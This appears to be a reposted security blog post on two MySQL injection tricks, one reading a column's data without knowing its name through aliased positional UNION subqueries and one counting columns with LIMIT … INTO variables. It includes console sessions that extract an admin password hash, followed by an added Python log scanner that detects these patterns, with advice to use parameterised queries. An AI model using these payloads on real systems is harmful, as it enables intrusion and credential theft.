[Repost] MySQL injection: retrieving the data of column X without knowing the column name

Author: Luan  Category: Repost  Published: 2017-06-22 10:17

Source: http://www.zcgonvh.com/post/injection_tips_non-field-names-injection-with-subquery.html

mysql> desc zzcms_admin;
+---------------+--------------+------+-----+---------+----------------+
| Field         | Type         | Null | Key | Default | Extra          |
+---------------+--------------+------+-----+---------+----------------+
| id            | int(11)      | NO   | PRI | NULL    | auto_increment |
| groupid       | int(11)      | YES  |     | NULL    |                |
| admin         | varchar(255) | YES  |     | NULL    |                |
| pass          | varchar(255) | YES  |     | NULL    |                |
| logins        | int(11)      | YES  |     | 0       |                |
| loginip       | varchar(255) | YES  |     | NULL    |                |
| lastlogintime | datetime     | YES  |     | NULL    |                |
| showloginip   | varchar(255) | YES  |     | NULL    |                |
| showlogintime | datetime     | YES  |     | NULL    |                |
+---------------+--------------+------+-----+---------+----------------+
9 rows in set (0.00 sec)

mysql> select c from(select 1 as a,2 as b,3 as c,4 as e,5 as f,6 as g,7 as h,8 as i,9 as j from. zzcms_admin where 1=2 union select * from. zzcms_admin)xxx;
+-------+
| c     |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)

mysql> select d from(select 1 as a,2 as b,3 as c,4 as d,5 as e,6 as f,7 as g,8 as h,9 as i from. zzcms_admin where 1=2 union select * from. zzcms_admin)xxx;
+----------------------------------+
| d                                |
+----------------------------------+
| 21232f297a57a5a743894a0e4a801fc3 |
+----------------------------------+
1 row in set (0.00 sec)

mysql>

Here is another small trick that may need to be used together with the one above: finding the number of columns in the current table after an ORDER BY X LIMIT clause:

mysql> select * from  zzcms_admin order by 1 limit 0,1;
+----+---------+-------+----------------------------------+--------+-----------+---------------------+-------------+---------------------+
| id | groupid | admin | pass                             | logins | loginip   | lastlogintime       | showloginip | showlogintime       |
+----+---------+-------+----------------------------------+--------+-----------+---------------------+-------------+---------------------+
|  1 |       1 | admin | 21232f297a57a5a743894a0e4a801fc3 |      2 | 127.0.0.1 | 2017-06-21 11:55:25 | 127.0.0.1   | 2017-06-20 14:43:37 |
+----+---------+-------+----------------------------------+--------+-----------+---------------------+-------------+---------------------+
1 row in set (0.00 sec)

mysql> select * from  zzcms_admin order by 1 limit 0,1 union select 1,2,3,4,5,6,7,8,9;
ERROR 1221 (HY000): Incorrect usage of UNION and ORDER BY
mysql> select * from  zzcms_admin order by 1 limit 0,1 into @1,@2,@3,@4,@5,@6,@7,@8;
ERROR 1222 (21000): The used SELECT statements have a different number of columns
mysql> select * from  zzcms_admin order by 1 limit 0,1 into @1,@2,@3,@4,@5,@6,@7,@8,@9;
Query OK, 1 row affected (0.00 sec)

mysql>
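Both sessions above leave a recognisable footprint in a query log: a derived table whose columns are numbered literals aliased to letters, an always-false WHERE feeding a UNION, and a LIMIT followed by a long INTO @var list. The following Python script is an added example written for this repost (it is not code from the original post or from zcgonvh's site) that scans constructed MySQL-general-log-style lines for these three patterns; the log format, the rule names and the sample lines are assumptions made for the demonstration.

```python
from __future__ import annotations

import re

# Constructed sample log, loosely in MySQL general-log style: "<timestamp> Query <sql>".
# Lines 2 and 3 reuse the statements shown on this page; lines 1 and 4 are benign.
SAMPLE_LOG = """\
2017-06-22T10:17:01 Query select id, admin from zzcms_admin where id = 1
2017-06-22T10:17:02 Query select c from(select 1 as a,2 as b,3 as c,4 as e,5 as f,6 as g,7 as h,8 as i,9 as j from. zzcms_admin where 1=2 union select * from. zzcms_admin)xxx
2017-06-22T10:17:03 Query select * from zzcms_admin order by 1 limit 0,1 into @1,@2,@3,@4,@5,@6,@7,@8,@9
2017-06-22T10:17:04 Query select count(*) as total, 1 as flag from zzcms_admin
"""

LOG_LINE = re.compile(r"^(?P<ts>\S+) Query (?P<sql>.+)$")

# Rule names are our own labels (assumption, not a standard taxonomy).
RULES = [
    # A derived table that starts with three or more "<number> as <name>" pairs and
    # is later UNIONed: the column-renaming trick from the first session above.
    ("positional-alias-union",
     re.compile(r"\(\s*select\s+(?:\d+\s+as\s+\w+\s*,\s*){2,}\d+\s+as\s+\w+.*?\bunion\b", re.S)),
    # LIMIT ... INTO @a,@b,@c,...: the column-count probe from the second session.
    ("limit-into-vars",
     re.compile(r"\blimit\b[^;]*?\binto\s+@\w+(?:\s*,\s*@\w+){2,}")),
]

# "where <n>=<m> union" with n != m: an always-false filter used only to
# borrow column names while every row comes from the UNIONed SELECT.
ALWAYS_FALSE_UNION = re.compile(r"\bwhere (\d+) ?= ?(\d+) union\b")


def normalize(sql: str) -> str:
    """Lower-case the statement, drop /* */ comments and collapse whitespace so
    that comment-padded variants (e.g. 1/**/as a) match the same rules."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"\s+", " ", sql)
    return sql.strip().lower()


def classify(sql: str) -> list[str]:
    """Return the names of every rule the statement triggers (empty if benign)."""
    q = normalize(sql)
    hits = [name for name, rx in RULES if rx.search(q)]
    m = ALWAYS_FALSE_UNION.search(q)
    if m and m.group(1) != m.group(2):
        hits.append("always-false-union")
    return hits


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Parse log lines and return (timestamp, rule names) for each flagged statement."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m["sql"])
        if hits:
            findings.append((m["ts"], hits))
    return findings


if __name__ == "__main__":
    for ts, hits in scan_log(SAMPLE_LOG):
        print(ts, ", ".join(hits))
```

The rules are deliberately narrow so that ordinary aliased aggregates (the fourth sample line) do not fire; they are a starting point for a query-log or WAF signature, not a substitute for fixing the root cause. Both tricks on this page only work because untrusted input is concatenated into the SQL text, so unusual or unknown column names are not a defence; parameterised queries remove the injection point regardless of how the schema is named.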
